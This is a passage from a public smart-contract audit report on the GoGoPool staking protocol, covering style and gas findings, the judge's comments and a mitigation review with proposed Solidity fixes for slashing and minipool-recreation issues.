41: setUint(keccak256("ProtocolDAO.InflationIntervalRate"), 1000133680617113500); // 5% annual calculated on a daily interval - Calculate in js example: let dailyInflation = web3.utils.toBN((1 + 0.05) ** (1 / (365)) * 1e18);
[N‑19] Variable names that consist of all capital letters should be reserved for constant
If the variable needs to be different based on which class it comes from, a view
function should be used instead (e.g. like this).
There are 2 instances of this issue.
[N‑20] Using >
without specifying an upper bound is unsafe
There will be breaking changes in future versions of solidity, and at that point your code will no longer be compatable. While you may have the specific version to use in a configuration file, others that include your source files may not.
There are 2 instances of this issue.
[N‑21] Typos
There are 3 instances of this issue.
[N‑22] File is missing NatSpec
There are 3 instances of this issue.
[N‑23] NatSpec is incomplete
There are 27 instances of this issue.
[N‑24] Not using the named return variables anywhere in the function is confusing
Consider changing the variable to be an unnamed one.
There is 1 instance of this issue:
File: contracts/contract/MinipoolManager.sol
/// @audit mp
572: function getMinipoolByNodeID(address nodeID) public view returns (Minipool memory mp) {
[N‑25] Contracts should have full test coverage
While 100% code coverage does not guarantee that there are no bugs, it often will catch easy-to-find bugs, and will ensure that there are fewer regressions when the code invariably has to be modified. Furthermore, in order to get full coverage, code authors will often have to re-organize their code so that it is more modular, so that each component can be tested separately, which reduces interdependencies between modules and layers, and makes for code that is easier to reason about and audit.
There is 1 instance of this issue:
File: Various Files
[N‑26] Large or complicated code bases should implement fuzzing tests
Large code bases, or code with lots of inline-assembly, complicated math, or complicated interactions between multiple contracts, should implement fuzzing tests. Fuzzers such as Echidna require the test writer to come up with invariants which should not be violated under any circumstances, and the fuzzer tests various inputs and function calls to ensure that the invariants always hold. Even code with 100% code coverage can still have bugs due to the order of the operations a user performs, and fuzzers, with properly and extensively-written invariants, can close this testing gap significantly.
There is 1 instance of this issue:
File: Various Files
[N‑27] Function ordering does not follow the Solidity style guide
According to the Solidity style guide, functions should be laid out in the following order :constructor()
, receive()
, fallback()
, external
, public
, internal
, private
, but the cases below do not follow this pattern.
There are 15 instances of this issue.
[N‑28] Contract does not follow the Solidity style guide’s suggested layout ordering
The style guide says that, within a contract, the ordering should be 1) Type declarations, 2) State variables, 3) Events, 4) Modifiers, and 5) Functions, but the contract(s) below do not follow this ordering.
There are 9 instances of this issue.
[N‑29] Open TODOs
Code architecture, incentives, and error handling/reporting questions/issues should be resolved before deployment.
There is 1 instance of this issue:
File: contracts/contract/MinipoolManager.sol
412: // TODO Revisit this logic if we ever allow unequal matched funds
Excluded findings
These findings are excluded from awards calculations because there are publicly-available automated tools that find them. The valid ones appear here for completeness.
Low Risk Issues
Issue | Instances | |
[L‑08] | Missing checks for address(0x0) when assigning values to address state variables |
1 |
[L‑09] | abi.encodePacked() should not be used with dynamic types when passing the result to a hash function such as keccak256() |
155 |
Total: 156 instances over 2 issues
Non-critical Issues
Issue | Instances | |
[N‑30] | Return values of approve() not checked |
2 |
[N‑31] | public functions not called by the contract should be declared external instead |
54 |
[N‑32] | Event is missing indexed fields |
26 |
Total: 82 instances over 3 issues
[L‑08] Missing checks for address(0x0)
when assigning values to address
state variables
There is 1 instance of this issue:
File: contracts/contract/Storage.sol
/// @audit (valid but excluded finding)
47: newGuardian = newAddress;
[L‑09] abi.encodePacked()
should not be used with dynamic types when passing the result to a hash function such as keccak256()
Use abi.encode()
instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. abi.encodePacked(0x123,0x456)
=> 0x123456
=> abi.encodePacked(0x1,0x23456)
, but abi.encode(0x123,0x456)
=> 0x0...1230...456
). “Unless there is a compelling reason, abi.encode
should be preferred”. If there is only one argument to abi.encodePacked()
it can often be cast to bytes()
or bytes32()
If all arguments are strings and or bytes, bytes.concat()
should be used instead.
There are 155 instances of this issue.
[N‑30] Return values of approve()
not checked
Not all IERC20
implementations revert()
when there’s a failure in approve()
. The function signature has a boolean
return value and they indicate errors that way instead. By not checking the return value, operations that should have marked as failed, may potentially go through without actually approving anything.
There are 2 instances of this issue.
[N‑31] public
functions not called by the contract should be declared external
Contracts are allowed to override their parents’ functions and change the visibility from external
to public
There are 54 instances of this issue.
[N‑32] Event is missing indexed
Index event fields make the field more quickly accessible to off-chain tools that parse events. However, note that each index field costs extra gas during emission, so it’s not necessarily best to index the maximum allowed per event (three fields). Each event
should use three indexed
fields if there are three or more fields, and gas usage is not particularly of concern for the events in question. If there are fewer than three fields, all of the fields should be indexed.
There are 26 instances of this issue.
Alex the Entreprenerd (judge) commented:
[L‑01] Inflation not locked for four years
Refactor. Code as is will revert after 4 years, so it’s enforced via config.[L‑02] Contract will stop functioning in the year 2106
Low[L‑03] Lower-level initializations should come first
Refactor in lack of specific risk[L‑04] Incorrect percentage conversion
Low[L‑05] Loss of precision
Low[L‑06] Signatures vulnerable to malleability attacks
Low[L‑07] require() should be used instead of assert()
Refactor[N‑01] Common code should be refactored
Refactor[N‑02] String constants used in multiple places should be defined as constants
Refactor[N‑03] Constants in comparisons should appear on the left side
Refactor[N‑04] Inconsistent address separator in storage names
Non-Critical[N‑05] Confusing function name
Non-Critical[N‑06] Misplaced punctuation
Non-Critical[N‑07] Upgradeable contract is missing a
storage variable to allow for new storage variables in later versions
Disputing for TokenAvax as it’s the child contract[N‑08] Import declarations should import specific identifiers, rather than the whole file
Non-Critical[N‑09] Missing initializer modifier on constructor
Refactor[N‑10] The nonReentrant modifier should occur before all other modifiers
Refactor[N‑11] override function arguments that are unused should have the variable name removed or commented out to avoid compiler warnings
Non-Critical[N‑12] constants should be defined rather than using magic numbers
Refactor[N‑13] Missing event and or timelock for critical parameter change
Non-Critical[N‑14] Events that mark critical parameter changes should contain both the old and the new value
Non-Critical[N‑15] Use a more recent version of solidity
Non-Critical[N‑16] Use a more recent version of solidity
See N-15[N‑17] Constant redefined elsewhere
Refactor[N‑18] Lines are too long
Non-Critical[N‑19] Variable names that consist of all capital letters should be reserved for constant/immutable variables
Refactor[N‑20] Using >/>= without specifying an upper bound is unsafe
Refactor[N‑21] Typos
Non-Critical[N‑22] File is missing NatSpec
Non-Critical[N‑23] NatSpec is incomplete
Non-Critical[N‑24] Not using the named return variables anywhere in the function is confusing
Refactor[N‑25] Contracts should have full test coverage
Refactor[N‑26] Large or complicated code bases should implement fuzzing tests
Refactor[N‑27] Function ordering does not follow the Solidity style guide
Non-Critical[N‑28] Contract does not follow the Solidity style guide’s suggested layout ordering
Non-Critical[N-29] Open TODOs
Alex the Entreprenerd (judge) commented:
6 Low, 15 Refactor, 15 Non-Critical, including downgraded findings (#733 & #734).
Best report by far, so far I thought the second best was the best (this one scores above 100%).
Well played.
Gas Optimizations
For this contest, 12 reports were submitted by wardens detailing gas optimizations. The report highlighted below by NoamYakov received the top score from the judge.
The following wardens also submitted reports: c3phas, betweenETHlines, IllIllI, AkshaySrivastav, ast3ros, camdengrieh, shark, latt1ce, fatherOfBlocks, chaduke, and kartkhira.
Issue | Instances | Total Gas Saved | |
[G‑01] | State variables can be packed into fewer storage slots | 1 | - |
[G‑02] | Use a more recent version of solidity | 2 | - |
[G‑03] | ++i /i++ should be unchecked{++i} /unchecked{i++} when it is not possible for them to overflow, as is the case when used in for - and while -loops |
10 | 600 |
[G‑04] | internal functions only called once can be inlined to save gas |
4 | 80 |
[G‑05] | Functions guaranteed to revert when called by normal users can be marked payable |
62 | 1302 |
[G‑06] | Optimize names to save gas | 13 | 286 |
[G‑07] | Use custom errors rather than revert() /require() strings to save gas |
4 | 200 |
[G‑08] | Add unchecked {} for subtractions where the operands cannot underflow because of a previous require() or if -statement |
7 | 595 |
[G‑09] | Multiple accesses of a mapping/array should use a local variable cache | 4 | 168 |
[G‑10] | State variables should be cached in stack variables rather than re-reading them from storage | 11 | 1067 |
[G‑11] | Modification of getX() , setX() , deleteX() , addX() and subX() in BaseAbstract.sol increases gas savings in [G‑10] |
116 | 11252 |
[G‑12] | <x> += <y> costs more gas than <x> = <x> + <y> for state variables (-= too) |
12 | 1356 |
[G‑13] | Division by two should use bit shifting | 1 | 20 |
[G‑14] | The result of function calls should be cached rather than re-calling the function | 2 | 200 |
[G‑15] | Don’t compare boolean expressions to boolean literals | 3 | 27 |
[G‑16] | Splitting require() statements that use && saves gas |
1 | 3 |
[G‑17] | Stack variable used as a cheaper cache for a state variable is only used once | 3 | 9 |
Total: 256 instances over 17 issues with 17165 gas saved.
Gas totals use lower bounds of ranges and count two iterations of each for
-loop. All values above are runtime, not deployment, values; deployment values are listed in the individual issue descriptions.
[G‑01] State variables can be packed into fewer storage slots
If variables occupying the same slot are both written by the same function or by the constructor, avoids a separate Gsset (20000 gas). Reads of the variables can also be cheaper.
There is 1 instance of this issue:
File: contracts\contract\tokens\TokenggAVAX.sol
/// @audit currently, `lastSync`, `rewardsCycleLength` and `rewardsCycleEnd` are
/// stored in a single storage slot and `lastRewardsAmt` is in another one.
/// Since all of these state variables except for `rewardsCycleLength` are
/// being set together (in `syncRewards()`), I suggest to reorder them so
/// that they will use the same storage slot and `rewardsCycleLength` will
/// use a different one.
40 /// @notice the effective start of the current cycle
41 uint32 public lastSync;
43 /// @notice the maximum length of a rewards cycle
44 uint32 public rewardsCycleLength;
46 /// @notice the end of the current cycle. Will always be evenly divisible by `rewardsCycleLength`.
47 uint32 public rewardsCycleEnd;
49 /// @notice the amount of rewards distributed in a the most recent cycle.
50 uint192 public lastRewardsAmt;
[G‑02] Use a more recent version of solidity
- Use a solidity version of at least 0.8.2 to get simple compiler automatic inlining.
- Use a solidity version of at least 0.8.3 to get better struct packing and cheaper multiple storage reads.
- Use a solidity version of at least 0.8.4 to get custom errors, which are cheaper at deployment than
strings. - Use a solidity version of at least 0.8.10 to have external calls skip contract existence checks if the external call has a return value.
There are 2 instances of this issue. (For in-depth details on this and all further gas optimizations with multiple instances, please see the warden’s full report.)
[G‑03] ++i
should be unchecked{++i}
when it is not possible for them to overflow, as is the case when used in for
- and while
The unchecked
keyword is new in solidity version 0.8.0, so this only applies to that version or higher, which these instances are. This saves 30-40 gas per loop.
There are 10 instances of this issue.
[G‑04] internal
functions only called once can be inlined to save gas
Not inlining costs 20 to 40 gas because of two extra JUMP
instructions and additional stack operations needed for function calls.
There are 4 instances of this issue.
[G‑05] Functions guaranteed to revert when called by normal users can be marked payable
If a function modifier such as onlyOwner
is used, the function will revert if a normal user tries to pay the function. Marking the function as payable
will lower the gas cost for legitimate callers because the compiler will not include checks for whether a payment was provided. The extra opcodes avoided are
(2), DUP1
(3), PUSH2
(3), JUMPI
(10), PUSH1
(3), DUP1
(1), POP
(2), which costs an average of about 21 gas per call to the function, in addition to the extra deployment cost.
There are 62 instances of this issue.
[G‑06] Optimize names to save gas
function names and public
member variable names can be optimized to save gas. See this link for an example of how it works. Below are the interfaces/abstract contracts that can be optimized so that the most frequently-called functions use the least amount of gas possible during method lookup. Method IDs that have two leading zero bytes can save 128 gas each during deployment, and renaming functions to have lower method IDs will save 22 gas per call, per sorted position shifted.
There are 13 instances of this issue.
[G‑07] Use custom errors rather than revert()
strings to save gas
Custom errors are available from solidity version 0.8.4. Custom errors save ~50 gas each time they’re hit by avoiding having to allocate and store the revert string. Not defining the strings also save deployment gas.
There are 4 instances of this issue.
[G‑08] Add unchecked {}
for subtractions where the operands cannot underflow because of a previous require()
or if
require(a <= b); x = b - a
=> require(a <= b); unchecked { x = b - a }
There are 7 instances of this issue.
[G‑09] Multiple accesses of a mapping/array should use a local variable cache
The instances below point to the second+ access of a value inside a mapping/array, within a function. Caching a mapping’s value in a local storage
or calldata
variable when the value is accessed multiple times, saves ~42 gas per access due to not having to recalculate the key’s keccak256 hash (Gkeccak256 - 30 gas) and that calculation’s associated stack operations. Caching an array’s struct avoids recalculating the array offsets into memory/calldata.
There are 4 instances of this issue.
[G‑10] State variables should be cached in stack variables rather than re-reading them from storage
The instances below point to the second+ access of a state variable within a function. Caching of a state variable replaces each Gwarmaccess (100 gas) with a much cheaper stack read. Other less obvious fixes/optimizations include having local memory caches of state variable structs, or having local caches of state variable contracts/addresses.
There are 11 instances of this issue.
[G‑11] Modification of getX()
, setX()
, deleteX()
, addX()
and subX()
in BaseAbstract.sol
increases gas savings in [G‑10]
Modify the getX()
, setX()
, deleteX()
, addX()
and subX()
functions in BaseAbstract.sol
to receive the address of the Storage
contract as an argument. This modification will create dozens more fixable instances of [G‑10].
There are 116 instances of this issue.
[G‑12] <x> += <y>
costs more gas than <x> = <x> + <y>
for state variables (-=
Using the addition operator instead of plus-equals saves 113 gas. Subtructions act the same way.
There are 12 instances of this issue.
[G‑13] Division by two should use bit shifting
<x> / 2
is the same as <x> >> 1
. While the compiler uses the SHR
opcode to accomplish both, the version that uses division incurs an overhead of 20 gas due to JUMP
s to and from a compiler utility function that introduces checks which can be avoided by using unchecked {}
around the division by two.
There is 1 instance of this issue:
File: contracts\contract\MinipoolManager.sol
413 uint256 avaxHalfRewards = avaxTotalRewardAmt / 2;
[G‑14] The result of function calls should be cached rather than re-calling the function
The instances below point to the second+ call of the function within a single function. Every external call made to a contract incurs at least 100 gas of overhead.
There are 2 instances of this issue.
[G‑15] Don’t compare boolean expressions to boolean literals
if (<x> == true)
=> if (<x>)
, if (<x> == false)
=> if (!<x>)
There are 3 instances of this issue.
[G‑16] Splitting require()
statements that use &&
saves gas
See this issue which describes the fact that there is a larger deployment gas cost, but with enough runtime calls, the change ends up being cheaper by 3 gas.
There is 1 instance of this issue:
File: contracts\contract\tokens\upgradeable\ERC20Upgradeable.sol
154 require(recoveredAddress != address(0) && recoveredAddress == owner, "INVALID_SIGNER");
[G‑17] Stack variable used as a cheaper cache for a state variable is only used once
If the variable is only accessed once, it’s cheaper to use the state variable directly that one time, and save the 3 gas the extra stack assignment would spend.
There are 3 instances of this issue.
Alex the Entreprenerd (judge) commented:
[G‑01] State variables can be packed into fewer storage slots
Not awarding as it will only save gas at deploy time[G‑02] Use a more recent version of solidity
Skipping as missing further info[G‑03]
should beunchecked{++i}
when it is not possible for them to overflow, as is the case when used in for- and while-loops
25 * 7[G‑04] internal functions only called once can be inlined to save gas
16 per instance
4 * 16[G‑05] Functions guaranteed to revert when called by normal users can be marked payable
Ignoring[G‑06] Optimize names to save gas
Ignoring[G‑07] Use custom errors rather than
strings to save gas
Ignoring for lack of proven benchmarks[G‑08] Add unchecked {} for subtractions where the operands cannot underflow because of a previous
or if-statement
7 * 20[G‑09] Multiple accesses of a mapping/array should use a local variable cache
2 are “normal” to avoid the -= or += the other 2 are valid
2 * 100[G‑10] State variables should be cached in stack variables rather than re-reading them from storage
11 * 100[G‑11] Modification of
in BaseAbstract.sol increases gas savings in [G‑10]
Am understanding this as the idea of inlining the call rather than using a function.
16 * 1161856
<x> += <y>
costs more gas than<x> = <x> + <y>
for state variables (-= too)
Out of scope[G‑13] Division by two should use bit shifting
Equivalent to using unchecked20
[G‑14] The result of function calls should be cached rather than re-calling the function
340 * 2680
[G‑15] Don’t compare boolean expressions to boolean literals
27[G‑16] Splitting require() statements that use && saves gas
Marginal[G‑17] Stack variable used as a cheaper cache for a state variable is only used once
MarginalTotal: 4262
[G‑11] Modification of
in BaseAbstract.sol increases gas savings in [G‑10]
Am understanding this as the idea of inlining the call rather than using a function 16 * 116This wasn’t what I meant. I meant that each of these functions accesses the
state variable (SLOAD). Therefore, when there’s more than one call to this group of functions (for example,setUint()
followed by anothersetUint()
, orsetUint()
followed bygetAddress()
), it would me much cheaper to cache that state variable (gogoStorage
) and pass it to the these functions. This way, there will be only one SLOAD.In my gas report, I flagged the second+ calls to this group of functions as instances, since this optimization can spare an SLOAD in each of these calls. There are 116 instances, each saves 100 gas (like in G-10) - meaning a total saving of 11600 gas.
<x> += <y>
costs more gas than<x> = <x> + <y>
for state variables (-= too)
Out of scopeWhy is that out-of-scope? The
contracts are in scope, and this optimization wasn’t included in the C4audit output.Overall, My gas report saves an additional amount of 12956 gas. So the total gas savings are 17218 gas. Therefore, I believe my gas report should be the one selected for the report.
Alex the Entreprenerd (judge) commented:
@NoamYakov - Thank you for the comment, to clarify regarding G-11, are you saying to cache the address of Storage or to make it Immutable as to avoid the extra SLOAD?
The += is a knee jerk reaction I have in judging and have judged it as OOS for all reports.
My own benchmarks show that’s it’s a very marginal saving, especially because it will not save gas when used in combination withunchecked
, either way it would raise / lower the majority of reports so it will not matter as much.Lmk about G-11 please.
I’m saying to cache the address of Storage in order to avoid the extra SLOAD.
Alex the Entreprenerd (judge) commented:
I agree with the suggested refactoring, I believe there’s fair ground to cap the value of the refactoring to a certain value (e.g 5k gas saved). That said, after factoring that in, the refactoring would save the most gas.
Technically a better solution would be to just use
which would avoid all SLOADs.
Mitigation Review
Following the C4 audit contest, 3 wardens (hansfriese, RaymondFam, and ladboy233) reviewed the mitigations for all identified issues. Additional details can be found within the C4 GoGoPool Versus Mitigation Review contest repository.
Overview of Changes
Summary from the Sponsor:
Here’s our biggest changes to look out for:
- Minipool State Machine - We’ve tightened up the allowed state transitions including a new recreate minipool method that’s atomic and doesn’t allow node ops to withdraw funds or hijack a minipool.
- Tracking AVAX High Water - Our previous system forced some tradeoffs to which AVAX is calculated in HighWater. We added a new variable
which tracks amount of AVAX actually validating on the P-Chain, and High Water is simply the highest validating amount during the period.- TokenGGP - Changed how tokens are inflated to actually mint rather than track tokens in the ProtocolDAO
- Contract Upgrades - We’re now able to upgrade as expected, to a contract with the same name as the existing contract
- Upgradeable Tokens - ERC20Upgradeable takes a variable version for it’s domain separator and we added storage gaps across the board
Mitigation Review Scope
URL | Mitigation of | Purpose |
https://github.com/multisig-labs/gogopool/pull/25 | H-01 | New variable to track validating avax |
Not fixing | H-02 | N/A |
https://github.com/multisig-labs/gogopool/pull/41 | H-03 | Base slash on validation period not full duration |
https://github.com/multisig-labs/gogopool/pull/23 | H-04 | Atomically recreate minipool to now allow hijack |
https://github.com/multisig-labs/gogopool/pull/49 | H-05 | Initialize ggAVAX with a deposit |
https://github.com/multisig-labs/gogopool/pull/41 | H-06 | If staked GGP doesn’t cover slash amount, slash it all |
https://github.com/multisig-labs/gogopool/pull/22 | M-01 | Pause startRewardsCycle when protocol is paused |
https://github.com/multisig-labs/gogopool/pull/32 | M-02 | Fix upgrade to work when a contract has the same name |
https://github.com/multisig-labs/gogopool/pull/20 | M-03 | Remove method that trapped Node Operator’s funds |
Not fixing | M-04 | N/A |
https://github.com/multisig-labs/gogopool/pull/22 | M-05 | Pause claimAndRestake as well |
Not fixing | M-06 | N/A |
Not fixing | M-07 | N/A |
https://github.com/multisig-labs/gogopool/pull/43 | M-08 | Use liquid staker avax amount instead of node op amount |
https://github.com/multisig-labs/gogopool/pull/23 | M-09 | Atomically recreate minipool so a node operator can’t withdraw inbetween |
https://github.com/multisig-labs/gogopool/pull/51 | M-10 | Reset rewards start time in cancel minipool |
Not fixing | M-11 | N/A |
https://github.com/multisig-labs/gogopool/pull/40 | M-12 | Base cancelMinipool delay on minipool creation time not rewards start time |
https://github.com/multisig-labs/gogopool/pull/41 | M-13 | If staked GGP doesn’t cover slash amount, slash it all |
https://github.com/multisig-labs/gogopool/pull/38 | M-14 | Added bounds for duration passed by Node Operator |
Not fixing in this version of the protocol | M-15 | N/A |
https://github.com/multisig-labs/gogopool/pull/50 | M-16 | ggAVAX max redeem incorrect, not fixing, but made test to illustrate. |
https://github.com/multisig-labs/gogopool/pull/28 | M-17 | Remove the state transition from Staking to Error. |
Not fixing in this version of the protocol | M-18 | N/A |
https://github.com/multisig-labs/gogopool/pull/42 | M-19 | We removed minipool count entirely. |
https://github.com/multisig-labs/gogopool/pull/33 | M-20 | Return correct value from maxMint and maxDeposit when the contract is paused. |
https://github.com/multisig-labs/gogopool/pull/37 | M-21 | Prevents division by zero error blocking startRewardCycle(). |
Not fixing in this version of the protocol | M-22 | N/A |
Mitigation Review Summary
Of the mitigations reviewed, 13 have been confirmed as well as 2 confirmed with comments:
- H-01: Mitigation confirmed with comments (full details in report from RaymondFam)
- H-03: Mitigation confirmed by RaymondFam and hansfriese
- H-05: Mitigation confirmed by RaymondFam and hansfriese
- M-01: Mitigation confirmed with comments (full details in report from RaymondFam)
- M-02: Mitigation confirmed by RaymondFam and hansfriese
- M-03: Mitigation confirmed by RaymondFam and hansfriese
- M-05: Mitigation confirmed by RaymondFam and hansfriese
- M-09: Mitigation confirmed by RaymondFam and hansfriese
- M-10: Mitigation confirmed by RaymondFam and hansfriese
- M-12: Mitigation confirmed by RaymondFam and hansfriese
- M-13: Mitigation confirmed by RaymondFam and hansfriese
- M-14: Mitigation confirmed by RaymondFam and hansfriese
- M-17: Mitigation confirmed by RaymondFam and hansfriese
- M-19: Mitigation confirmed by RaymondFam and hansfriese
- M-20: Mitigation confirmed by RaymondFam and hansfriese
The 4 remaining mitigations have either not been confirmed and/or introduced new issues. See full details below.
(Note: mitigation reviews below are referenced as MR:S-N
, MitigationReview:NewIssueSeverity-NewIssueNumber
[MR:M-01] The node operators are likely to be slashed in an unfair way
Submitted by hansfriese
Original Issue
H-04: Hijacking of node operators minipool causes loss of staked funds
In the original implementation, the protocol had some unnecessary state transitions and it was possible for node operators to interfere the recreation process.
The main problem was the recordStakingEnd()
and recreateMiniPool()
were separate external functions and the operator could frontrun the recreateMiniPool()
and call withdrawMinipoolFunds()
PR #23
The mitigation added a new function recordStakingEndThenMaybeCycle()
and handled recordStakingEnd()
and recreateMiniPool()
in an atomic way.
With this mitigation, the state flow is now as below and it is impossible for a node operator to interfere the recreation process.
But this mitigation created another minor issue that the node operators have risks to be slashed in an unfair way.
New issue
The node operators are likely to be slashed in an unfair way
Code snippet
Proof of concept
In the previous implementation, I assumed rialtos are smart enough to recreate minipools only when it’s necessary.
But now, the recreation process is included as an optional way in the recordStakingEndThenMaybeCycle()
, so as long as the check initialStartTime + duration > block.timestamp
at L#464 passes, recreation will be processed.
Now let us consider the timeline. One validation cycle in the whole sense contains several steps as below.
- Let us assume it is somehow possible that
startTime[1] > endTime[0]
, i.e., the multisig failed to start the next cycle at the exact the same timestamp to the previous end time. This is quite possible due to various reasons because there are external processes included. In this case the timeline will look as below.
As an extreme example, let us say the node operator created a minipool with duration of 42 days (with 3 cycles in mind) and it took 12 days to start the second cycle. When the
(finishing the second cycle) was called, two cases are possible. - It is possible that the
initialStartTime + duration <= block.timestamp
. In this case, the protocol will not start the next cycle. And the node validation was done for two cycles different to the initial plan. - If
initialStartTime + duration > block.timestamp
, the protocol will start the third cycle. But on the end of that cycle, it is likely that the node is not eligible for reward by the Avalanche validators voting. (Imagine the node op lent a server for 42 days, then 42-14*2-12=2 days from the third cycle start the node might have stopped working and does not meet the 80% uptime condition) Then the node operator will be punished and GGP stake will be slashed. This is unfair. - Assume it is 100% guaranteed that
for all cycles.
The timeline will look as below and we can say the second case of the above scenario still exists if the node operator didn’t specify the duration to be a complete multiple of 14 days. (365 days is not!)
Then the last cycle end will be later than
initialStartTime + duration
and the node op can be slashed in an unfair way again.
So even assuming the perfect condition, the protocol works in kind of unfair way for node operators.
The main reason of this problem is that technically there exists two timelines. And the protocol does not track the actual validation duration that the node was used accurately.
At least, the protocol should not start a new cycle if initialStartTime + duration < block.timestamp + 14 days
because it is likely that the node operator get punished at the end of that cycle.
Recommended additional mitigation
- If it is 100% guaranteed that
for all cycles, I recommend starting a new cycle only ifinitialStartTime + duration < block.timestamp + 14 days
. - If not, I suggest adding a new state variable that will track the actual validation period (actual utilized period).
Mitigation error - created another issue for the same edge case.
Alex the Entreprenerd (judge) commented:
Per full discussion with sponsor and warden here, Medium seems like the most appropriate Severity, the finding is valid though in that the FSM can behave in an unintended way due to lack of modulo math.
[MR:M-02] Deficiency of slashed GGP amount should be made up from node operator’s AVAX
Submitted by RaymondFam, also found by hansfriese and ladboy233
Original Issue
H-06: MinipoolManager: node operator can avoid being slashed
If staked GGP doesn’t cover slash amount, slashing it all will not be fair to the liquid stakers. Slashing is rare, and that the current 14 day validation cycle which is typically 1/26 of the minimum amount of GGP staked is unlikely to bump into this situation unless there is a nosedive of GGP price in AVAX. The deficiency should nonetheless be made up from avaxNodeOpAmt
should this unfortunate situation happen.
Proof of Concept
File: MinipoolManager.sol#L731-L733
if (staking.getGGPStake(owner) < slashGGPAmt) {
slashGGPAmt = staking.getGGPStake(owner);
As can be seen from the code block above, in extreme and unforeseen cases, the difference between staking.getGGPStake(owner)
and slashGGPAmt
can be significant. Liquid stakers would typically and ultimately care about how they are going to be adequately compensated with, in AVAX preferably.
Recommended Mitigation Steps
Consider having the affected if block refactored as follows:
Staking staking = Staking(getContractAddress("Staking"));
if (staking.getGGPStake(owner) < slashGGPAmt) {
slashGGPAmt = staking.getGGPStake(owner);
+ uint256 diff = slashGGPAmt - staking.getGGPStake(owner);
+ Oracle oracle = Oracle(getContractAddress("Oracle"));
+ (uint256 ggpPriceInAvax, ) = oracle.getGGPPriceInAVAX();
+ uint256 diffInAVAX = diff.mulWadUp(ggpPriceInAvax);
+ staking.decreaseAVAXStake(owner, diffInAVAX);
+ Vault vault = Vault(getContractAddress("Vault"));
+ vault.transferAVAX("ProtocolDAO", diffInAVAX);
As the warden pointed out, this event is very unlikely. I think that it is a reasonable risk for the protocol to take. Slashing does not exist in Avalanche, you simply get rewards or do not, so personally, I don’t think slashing their AVAX would be a good solution as it goes against Avalanche practices. Will bring it up to the team to see what they think.
The team seems to be in consensus that this is unlikely and that we will not be changing. The proposed solution goes against how Avalanche protocol operates so we believe it would not be an appropriate fix.
RaymondFam (warden) commented:
The proposed solution refers to slashing of AVAX in C Chain where this measure is solely at the discretion of the protocol. But I understand the complication entailed in making fixes for incidents that will be rare to occur.
Alex the Entreprenerd (judge) commented:
I believe the Sponsors opinion to be valid, and that the scenario may be unlikely.
However, I think the math shows that the system would be taking a loss which may be notable.
I’m thinking Medium Severity would be appropriate, but a Nofix seems acceptable given the odds (a “risk treasury” could be created to account for this scenario without needing to change the contracts).
[MR:M-03] amountAvailableForStaking()
not fully utilized with compoundedAvaxNodeOpAmt
easily forfeited
Submitted by RaymondFam
Original Issue
M-08: Recreated pools receive a wrong AVAX amount due to miscalculated compounded liquid staker amount
The mitigated step is implemented at the expense of economic loss to both the node operators and the liquid stakers if compoundedAvaxNodeOpAmt <= ggAVAX.amountAvailableForStaking()
Proof of Concept
Here is a typical scenario:
- The protocol now assumes that a 1:1 nodeOp:liqStaker funds ratio is guaranteed to be met because of the atomic transaction that has also been implemented.
- This is deemed an edge case that will only be optimally utilized if
compoundedAvaxAmt == ggAVAX.amountAvailableForStaking()
. - The atomic transaction is going to fail if
compoundedAvaxAmt > ggAVAX.amountAvailableForStaking()
after all due to situations like liquid stakers have been actively callingwithdrawAVAX()
Under normal circumstances, ggAVAX.amountAvailableForStaking()
is going to be adequate enough to cater for compoundedAvaxNodeOpAmt
. This should not be easily forfeited without first checking whether or not ggAVAX.amountAvailableForStaking()
is greater than compoundedAvaxNodeOpAmt
Recommended Mitigation Steps
Consider implementing the following check in recreateMinipool()
to get the best out of it:
File: MinipoolManager.sol#L486-L517
function recreateMinipool(address nodeID) internal whenNotPaused {
int256 minipoolIndex = onlyValidMultisig(nodeID);
Minipool memory mp = getMinipool(minipoolIndex);
MinipoolStatus currentStatus = MinipoolStatus(mp.status);
if (currentStatus != MinipoolStatus.Withdrawable) {
revert InvalidStateTransition();
+ uint256 compoundedAvaxAmt;
+ uint256 rewardAmt;
+ if (mp.avaxNodeOpAmt + mp.avaxNodeOpRewardAmt <= ggAVAX.amountAvailableForStaking()) {
+ compoundedAvaxAmt = mp.avaxNodeOpAmt + mp.avaxNodeOpRewardAmt;
+ rewardAmt = mp.avaxNodeOpRewardAmt;
+ } else {
+ compoundedAvaxAmt = mp.avaxNodeOpAmt + mp.avaxLiquidStakerRewardAmt;
+ rewardAmt = mp.avaxLiquidStakerRewardAmt;
+ }
// Compound the avax plus rewards
// NOTE Assumes a 1:1 nodeOp:liqStaker funds ratio
- uint256 compoundedAvaxAmt = mp.avaxNodeOpAmt + mp.avaxLiquidStakerRewardAmt;
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), compoundedAvaxAmt);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), compoundedAvaxAmt);
Staking staking = Staking(getContractAddress("Staking"));
// Only increase AVAX stake by rewards amount we are compounding
// since AVAX stake is only decreased by withdrawMinipool()
- staking.increaseAVAXStake(mp.owner, mp.avaxLiquidStakerRewardAmt);
+ staking.increaseAVAXStake(mp.owner, rewardAmt);
staking.increaseAVAXAssigned(mp.owner, compoundedAvaxAmt);
if (staking.getRewardsStartTime(mp.owner) == 0) {
// Edge case where calculateAndDistributeRewards has reset their rewards time even though they are still cycling
// So we re-set it here to their initial start time for this minipool
staking.setRewardsStartTime(mp.owner, mp.initialStartTime);
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
uint256 ratio = staking.getCollateralizationRatio(mp.owner);
if (ratio < dao.getMinCollateralizationRatio()) {
revert InsufficientGGPCollateralization();
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
emit MinipoolStatusChanged(nodeID, MinipoolStatus.Prelaunch);
Alex the Entreprenerd (judge) commented:
Per full discussion with sponsor and warden here, I believe we can agree with the validity of the finding but we’re unclear in terms of resolution.
I’ll give it a second check before awarding, but marking as valid for now.
RaymondFam (warden) commented:
Here is one solution I could suggest:
